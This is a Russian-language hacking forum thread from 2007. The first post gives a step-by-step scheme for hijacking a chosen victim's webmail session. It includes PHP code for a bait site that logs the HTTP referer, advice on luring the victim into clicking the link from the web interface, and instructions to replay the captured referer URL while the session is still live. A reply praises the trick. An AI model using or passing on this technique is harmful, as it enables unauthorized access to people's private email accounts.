| DDosT™ | Дата: Четверг, 31.05.2007, 16:01 | Сообщение # 1 |
|
Группа: Удаленные
| Интересную фишку прочитал недавно, короче регим какой нить левый сайт, ну например www.prelest.h18.ru, размещаем на нём приманку для юзера которого хотим ломануть, а заодно в файле index.php пишем что-то вроде этого:
---------------------------------------------------------------------------------------------------------
//Код я ща сам настряпал, вы его можете хорошенько автоматизировать
$reff = urldecode(getenv('HTTP_REFERER'));
if ($reff)
{
$file = fopen ("reff.txt","r+");
if ($file)
{
fputs($file, $reff);
fclose($file);
}
else
echo "Не удаётся открыть файл";
}
else
{
$file = fopen("reff.txt","r+");
fputs($file, "referer нулевой... клиент зашёл либо с mail-client либо скопировал сцылку и вставил в адресную строку, нужно заставить человека зайти на свой почтовый ящик через web-интерфейс и щёлкнуть по сцылке, а не копировать её в адресную строку");
}
---------------------------------------------------------------------------------------------------------
Дальше кидаете на мыло юзеру ссылку, www.prelest.h18.ru/index.php и как только он зашёл резво смотрите в файл reff.txt(его тоже нужно предварительно создать), там будет его реферер с которого он пришёл, вот почему так важно чтобы юзер проверял почту через web-интерфейс и щёлкал там по ссылке, а не копировал её в адресную строку. Так вот, вы берёте его реферер и пока он ещё не вышел с почты и сессия действует, вставляете его реферер в адресную строку и вуаля... вы в его почте!
|
| |
|
|
| Esmiralda | Дата: Четверг, 07.06.2007, 16:47 | Сообщение # 2 |
Полковник
Группа: Новенькие
Сообщений:153
Статус: Offline
| Насколько я заметила это не везде срабатывает или просто я не успеваю пока он не выйдет попасть, но идейка неплохая челу, создавшему ее надо памятник поставить во весь рост))
Хакером можешь ты не быть, но знать компьютер ты обязан)) 
|
| |
|
|
